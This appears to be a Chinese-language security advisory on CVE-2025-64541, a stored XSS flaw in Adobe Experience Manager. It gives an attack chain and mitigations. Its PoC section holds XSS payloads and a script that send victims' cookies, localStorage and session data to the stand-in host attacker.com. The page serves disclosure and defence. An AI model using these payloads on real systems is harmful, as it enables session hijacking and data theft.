CVE-2025-64541 Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64541

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64541是Adobe Experience Manager中的一个存储型跨站脚本（XSS）漏洞，CVSS评分5.4，属于中等严重程度。该漏洞影响了Adobe Experience Manager 6.5.23及更早版本。攻击者可以利用此漏洞通过低权限账号在易受攻击的表单字段中注入恶意脚本代码。当其他用户浏览包含该恶意字段的页面时，注入的JavaScript代码将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容。由于该漏洞为存储型XSS，恶意脚本会被永久保存在服务器端，影响范围更广，危害更为严重。攻击者无需具备高权限即可实施攻击，但需要诱导受害者访问恶意页面才能触发漏洞利用。

技术细节

Adobe Experience Manager 6.5.23及之前版本在处理用户输入时存在输入验证不足的问题。攻击者可以在表单字段中插入恶意JavaScript代码（如<script>alert(document.cookie)</script>或<img src=x onerror=...>等payload），该代码会被存储在服务器数据库中。当其他用户访问包含该字段的页面时，服务器会将存储的恶意内容原样返回给客户端浏览器。由于浏览器信任来自服务器的响应，恶意脚本会作为合法页面内容的一部分被执行。攻击者可以利用此漏洞窃取受害者的认证令牌、Cookie信息，或通过DOM操作修改页面内容进行钓鱼攻击。修复方案需要在数据入库前对用户输入进行严格的HTML编码和输入验证，使用Content Security Policy（CSP）限制脚本执行，并实施输出编码确保特殊字符被正确转义。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标Adobe Experience Manager版本，确认版本号<=6.5.23，并定位可利用的表单提交端点

STEP 2

步骤2：恶意Payload注入

攻击者使用低权限账号登录AEM，在表单字段中注入XSS恶意代码（如<script>标签或事件处理器），提交后数据被存储到服务器

STEP 3

步骤3：等待受害者访问

攻击者等待具有管理权限或其他用户访问包含恶意字段的页面，或通过社交工程诱导受害者访问特定URL

STEP 4

步骤4：恶意脚本执行

当受害者浏览器加载页面时，存储的恶意JavaScript代码被作为页面内容执行，可以窃取Cookie、会话令牌或执行其他恶意操作

STEP 5

步骤5：会话劫持与数据窃取

攻击者获取受害者凭证后可以劫持会话，进一步获取敏感数据、修改内容或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<form action="https://target-aem.com/content/forms/af/submit" method="POST"> <input type="hidden" name="name" value='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'> <button type="submit">Submit</button> </form>  <form action="https://target-aem.com/content/forms/af/submit" method="POST"> <input type="hidden" name="email" value='[email protected]"><img src=x onerror="fetch('https://attacker.com/log?data='+btoa(document.cookie))">'> <button type="submit">Submit</button> </form>  <form action="https://target-aem.com/content/forms/af/submit" method="POST"> <input type="hidden" name="comments" value='<svg/onload=fetch("https://attacker.com/exfil?cookie="+document.cookie)>'> <button type="submit">Submit</button> </form>  <script> // Steal session and send to attacker var sessionData = { cookies: document.cookie, localStorage: localStorage, sessionStorage: sessionStorage, userAgent: navigator.userAgent }; fetch('https://attacker.com/collect', { method: 'POST', body: JSON.stringify(sessionData), headers: {'Content-Type': 'application/json'} }); </script>

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.0 ~ 6.5.23

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 启用AEM的XSS过滤功能；2) 实施严格的输入验证规则，禁止在表单字段中使用HTML标签和JavaScript代码；3) 配置WAF（Web应用防火墙）规则检测和拦截XSS攻击载荷；4) 限制低权限用户对表单编辑功能的访问；5) 实施严格的CORS策略；6) 对敏感操作启用双重认证；7) 监控日志中的可疑XSS攻击特征。建议尽快升级到官方发布的安全版本。